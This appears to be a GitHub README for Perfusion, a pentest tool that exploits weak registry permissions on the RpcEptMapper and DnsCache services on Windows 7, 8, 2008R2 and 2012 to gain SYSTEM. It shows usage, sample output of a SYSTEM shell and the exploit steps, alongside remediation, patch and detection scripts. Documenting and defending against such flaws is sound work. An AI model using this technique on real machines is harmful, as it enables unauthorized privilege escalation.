Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)

Overview

Perfusion

On Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012, the registry keys of the RpcEptMapper and DnsCache (7/2008R2 only) services are configured with weak permissions. Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).

This tool is intended to help security consultants during penetration tests. This software is provided as is, and I will probably not provide any support. That said, I tested it thoroughly on three different virtual machines, so there should not be any significant issue.

For more information: https://itm4n.github.io/windows-registry-rpceptmapper-eop/

Known issues

⚠️ READ THIS BEFORE USING THIS TOOL ⚠️

During the development phase of this tool, I observed two different behaviors:

  1. The DLL is loaded directly by the main process of the WMI service as NT AUTHORITY\SYSTEM. In this case, the exploit works perfectly fine.
  2. The DLL is loaded by a subprocess of the WMI service that runs as NT AUTHORITY\LOCAL SERVICE. In this case, the service loads the DLL while impersonating the client. It turns out a privilege escalation is still possible on Windows 7 (because of another vulnerability), but the implementation cost was not worth the effort.

I am not able to explain this difference because my trigger code was always the same. In either case, let the exploit do its job so that it can clean everything up when it's done. If the exploit fails, there is still a chance it will work a few minutes or hours later.

✔️ Here is what you should see when the exploit works:

C:\Temp>Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\Lab-User\AppData\Local\Temp\performance_2900_368_1.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[*] Deleted Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Temp>whoami
nt authority\system

C:\Temp>

Here is what you should see when the exploit fails:

C:\Temp>Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\Lab-User\AppData\Local\Temp\performance_636_3000_1.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[-] Exploit completed but no SYSTEM Token. :/
[*] Waiting for the Trigger Thread to terminate... OK
[*] Deleted Performance registry key.
[*] Deleted Performance DLL.

C:\Temp>

Build instructions

This solution is composed of two projects that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions:

  1. Open the Solution with Visual Studio 2019
  2. Select Release / x64
  3. Build > Build Solution

Usage

You can check the help message using the -h option.

C:\TOOLS>Perfusion.exe -h
 _____         ___         _
|  _  |___ ___|  _|_ _ ___|_|___ ___
|   __| -_|  _|  _| | |_ -| | . |   |  version 0.1
|__|  |___|_| |_| |___|___|_|___|_|_|  by @itm4n

Description:
  Exploit tool for the RpcEptMapper registry key vulnerability.

Options:
  -c   Command - Execute the specified command line
  -i   Interactive - Interact with the process (default: non-interactive)
  -d   Desktop - Spawn a new process on your desktop (default: hidden)
  -h   Help - That's me :)

Remediation / Patch

The following versions of Windows are vulnerable:

Windows version        Vulnerable registry keys
Windows 7              RpcEptMapper, DnsCache
Windows Server 2008R2  RpcEptMapper, DnsCache
Windows 8              RpcEptMapper
Windows Server 2012    RpcEptMapper

As far as I know, this vulnerability will not be fixed by Microsoft, for some reason. The best solution is still to upgrade to Windows 10 / Server 2019 but if it is not a short-term option, you can still patch this issue yourself by removing the CreateSubKey permission for both NT AUTHORITY\Authenticated Users and BUILTIN\Users on the following registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
  • HKLM\SYSTEM\CurrentControlSet\Services\DnsCache

I created a patch for this vulnerability in the form of a PowerShell script: RegistryPatch.ps1. This script removes the CreateSubKey right on the two above-mentioned registry keys for the following identities: NT AUTHORITY\INTERACTIVE, BUILTIN\Users and/or BUILTIN\Authenticated Users.

  • Check if a machine is vulnerable (Windows Server 2012 here):

    PS C:\Temp> . .\RegistryPatch.ps1; Invoke-RegistryPatch -Verbose
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
    VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\Authenticated Users" has "QueryValues, CreateSubKey, ReadPermissions" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
    VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "QueryValues, CreateSubKey, Notify" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    True

  • Apply the patch (Windows Server 2008 R2 here):

    PS C:\Temp> . .\RegistryPatch.ps1; Invoke-RegistryPatch -Patch -Verbose
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
    VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\Authenticated Users" has "QueryValues, CreateSubKey, ReadPermissions" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
    VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "QueryValues, CreateSubKey, Notify" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
    VERBOSE: The new ACL was applied
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
    VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\INTERACTIVE" has "QueryValues, CreateSubKey, EnumerateSubKeys, ReadPermissions" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
    VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "CreateSubKey, ReadKey" rights
    VERBOSE: InheritanceFlags: None
    VERBOSE: IsInherited: False
    VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
    VERBOSE: The new ACL was applied
    True
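The remediation above boils down to one DACL change per service key: strip CreateSubKey from the Allow ACEs held by low-privileged identities while leaving their read rights alone. The script below is an added example written for this page; it is not the project's RegistryPatch.ps1 and does not reproduce it. It uses only the .NET RegistrySecurity API, matches identities by well-known SID (Authenticated Users, INTERACTIVE, Users) so localized group names do not matter, and only touches explicit ACEs, which is what the verbose output above shows (IsInherited: False). The $Patch switch and function names are this example's own.

```powershell
# Added example (not the project's RegistryPatch.ps1): audit the two service keys named
# in the README for an Allow ACE that grants CreateSubKey to a low-privileged identity,
# and optionally strip just that right so the identity keeps its read access.
# Auditing needs only read access to the keys; patching needs an elevated prompt.

$ServiceKeys = @(
    'SYSTEM\CurrentControlSet\Services\RpcEptMapper',
    'SYSTEM\CurrentControlSet\Services\DnsCache'      # vulnerable on 7 / 2008R2 only
)

# Matched by well-known SID so localized group names do not matter.
$LowPrivSids = @(
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-5-4',       # NT AUTHORITY\INTERACTIVE
    'S-1-5-32-545'   # BUILTIN\Users
)

$CreateSubKey = [System.Security.AccessControl.RegistryRights]::CreateSubKey

function Get-WeakCreateSubKeyAce {
    param([string]$SubKey)

    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
        $SubKey,
        [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
        [System.Security.AccessControl.RegistryRights]::ReadPermissions)
    if ($null -eq $key) { return @() }   # key does not exist on this Windows version

    $acl = $key.GetAccessControl()
    $key.Close()

    # Explicit ACEs only (the README's output shows IsInherited: False); an inherited
    # grant would have to be fixed on the parent key instead.
    $acl.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object {
            $_.AccessControlType -eq [System.Security.AccessControl.AccessControlType]::Allow -and
            ([int]$_.RegistryRights -band [int]$CreateSubKey) -ne 0 -and
            $LowPrivSids -contains $_.IdentityReference.Value
        }
}

function Remove-WeakCreateSubKeyRight {
    param([string]$SubKey)

    $weakAces = @(Get-WeakCreateSubKeyAce -SubKey $SubKey)
    if ($weakAces.Count -eq 0) { return $false }

    # WRITE_DAC is all that is needed to rewrite the DACL; no ownership change.
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
        $SubKey,
        [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
        [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
        [System.Security.AccessControl.RegistryRights]::ReadPermissions)
    $acl = $key.GetAccessControl()

    foreach ($ace in $weakAces) {
        # RemoveAccessRule subtracts the rights of the supplied rule from the matching ACE,
        # so passing a CreateSubKey-only rule leaves QueryValues, Notify, etc. in place.
        $strip = New-Object System.Security.AccessControl.RegistryAccessRule(
            $ace.IdentityReference, $CreateSubKey,
            $ace.InheritanceFlags, $ace.PropagationFlags,
            [System.Security.AccessControl.AccessControlType]::Allow)
        [void]$acl.RemoveAccessRule($strip)
    }
    $key.SetAccessControl($acl)
    $key.Close()
    return $true
}

# Driver: audit every key; apply the fix only when $Patch is $true (run elevated).
$Patch = $false

foreach ($subKey in $ServiceKeys) {
    $aces = @(Get-WeakCreateSubKeyAce -SubKey $subKey)
    if ($aces.Count -eq 0) {
        Write-Output ('[+] HKLM\{0}: no low-privileged CreateSubKey grant' -f $subKey)
        continue
    }
    foreach ($ace in $aces) {
        $who = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value
        Write-Output ('[!] HKLM\{0}: {1} has {2}' -f $subKey, $who, $ace.RegistryRights)
    }
    if ($Patch -and (Remove-WeakCreateSubKeyRight -SubKey $subKey)) {
        Write-Output ('[*] HKLM\{0}: DACL updated' -f $subKey)
    }
}
```

Run it once with $Patch left at $false to see which ACEs would be changed, then again elevated with $Patch set to $true. Re-running afterwards should report no low-privileged CreateSubKey grant on either key.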

How does this exploit work?

Below are the exploit steps that are implemented in this tool:

  1. A Process is created in the background in a suspended state (using the specified command line).
  2. The embedded payload DLL is written to the current user's Temp folder.
  3. A Performance key is created under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper and is populated with the appropriate values, including the full path of the DLL that was created at step 2.
  4. The WMI class Win32_Perf is created and invoked to trigger the collection of Windows Performance Counters.
  5. The DLL is loaded by the WMI service either as NT AUTHORITY\SYSTEM or NT AUTHORITY\LOCAL SERVICE.
  6. If the DLL is loaded by NT AUTHORITY\SYSTEM, its Token is duplicated and is applied to the Process that was initially created by the user at step 1.
  7. Everything is cleaned up and the main Thread of the suspended Process is resumed.
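From a defender's side, step 3 is the durable artifact of this technique: a Performance subkey under a service key that never ships with one, whose Library value points at a DLL outside System32 (here, the user's Temp folder). The script below is an added detection example written for this page, not part of the Perfusion project. It walks every service key, flags a Performance subkey under RpcEptMapper or DnsCache, and more generally flags any counter Library that resolves outside System32; the function names are this example's own.

```powershell
# Added detection example (not part of the Perfusion project): enumerate every
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\Performance key and flag the two
# conditions this technique produces: a Performance subkey under RpcEptMapper or
# DnsCache, which ship without one, and a counter Library that resolves outside
# System32. Read-only; no elevation needed because these keys are world-readable.

$ServicesRoot = 'SYSTEM\CurrentControlSet\Services'
$System32 = Join-Path $env:SystemRoot 'System32'
$KeysWithoutCounters = @('RpcEptMapper', 'DnsCache')   # the keys named on the page

function Resolve-CounterLibrary {
    param([string]$Library)
    # Library holds a bare file name (resolved from System32), a %SystemRoot%-style
    # path, or a full path; normalise all three to an absolute path.
    $expanded = [Environment]::ExpandEnvironmentVariables($Library.Trim('"'))
    if (-not [System.IO.Path]::IsPathRooted($expanded)) {
        $expanded = Join-Path $System32 $expanded
    }
    return [System.IO.Path]::GetFullPath($expanded)
}

function Get-SuspiciousPerformanceKey {
    $findings = @()
    $root = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($ServicesRoot)
    foreach ($name in $root.GetSubKeyNames()) {
        try { $perf = $root.OpenSubKey("$name\Performance") }
        catch [System.Security.SecurityException] { continue }   # a few service keys are not world-readable
        if ($null -eq $perf) { continue }

        $library = [string]$perf.GetValue('Library')
        $perf.Close()
        $reasons = @()

        if ($KeysWithoutCounters -contains $name) {
            $reasons += 'Performance subkey present on a service that normally has none'
        }
        if ($library) {
            $path = Resolve-CounterLibrary $library
            if (-not $path.StartsWith($System32, [StringComparison]::OrdinalIgnoreCase)) {
                $reasons += "counter DLL outside System32: $path"
            }
        }
        if ($reasons.Count -gt 0) {
            $findings += New-Object PSObject -Property @{
                Service = $name; Library = $library; Reasons = $reasons
            }
        }
    }
    $root.Close()
    return $findings
}

foreach ($f in Get-SuspiciousPerformanceKey) {
    Write-Output ('[!] {0} (Library={1}): {2}' -f $f.Service, $f.Library, ($f.Reasons -join '; '))
}
```

Treat the output as a triage list rather than a verdict: third-party products legitimately register counter DLLs from their own install directories, so the "outside System32" hits need a one-time allowlist, whereas a Performance subkey under RpcEptMapper or DnsCache has no legitimate reason to exist on the affected versions. Because the tool deletes the key and DLL when it finishes, this check catches an exploit in progress or one that did not clean up; for after-the-fact evidence, registry key creation auditing on the two service keys is the complementary control.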
Issues

  • vcruntime140d.dll and ucrtbased.dll required

    Hi,

    The dlls in the subject are missing and Perfusion could not run. I tried to google and found out that I will have to install Visual C++ 2015 x64 14.0.24123. I decided not to remove my current packages as that might nuke other software, so I went to the following websites to download the DLL files and saved them to the same Debug directory. https://www.dll-files.com/vcruntime140d.dll.html https://www.dll-files.com/ucrtbased.dll.html

    There are quite a lot of versions so I downloaded the following x64 files:
    vcruntime140d.dll - SHA1 - 4021b804469816c3136b40c4ceb44c8d60ed15f5
    ucrtbased.dll - SHA1 - 56c2e8fb1af609525b0f732bb67b806bddab3752

    Tried a second time with:
    vcruntime140d.dll - SHA1 - bcbc1ebd5a592c2df216d3211f309a79f9cd8a9b

    Checked my Windows 10 and I have the following installed. Running as Administrator in CMD, I got the following error 1813.

    Checked my Windows Server 2012 and I have the following installed.

    Tried to use the 32 bit files on 2012 and Perfusion would not even run.
    vcruntime140d.dll - SHA1 - e1b692518cf0d4a67c63ed95c9655c002d79b0cd
    vcruntime140d.dll - SHA1 - aa18ef3884a6ee4f9e352ed86b958a15d62ce711
    vcruntime140d.dll - SHA1 - cd93187f3895dcc8ebb0efeb483eec15b848ef36
    ucrtbased.dll - SHA1 - 9529cc4ee868a9f5cf996f7075e45b9619c066a6

    opened by Kinny092 1
  • Perfusion Worker Windows Multipoint

    Hi

    Your exploit Perfusion works on Windows Server Multipoint 2011 SP1 (Windows 2008 R2 based).

    Look: https://www.youtube.com/watch?v=VRs9Q5_0nrs&t=2s

    opened by Marcio861 0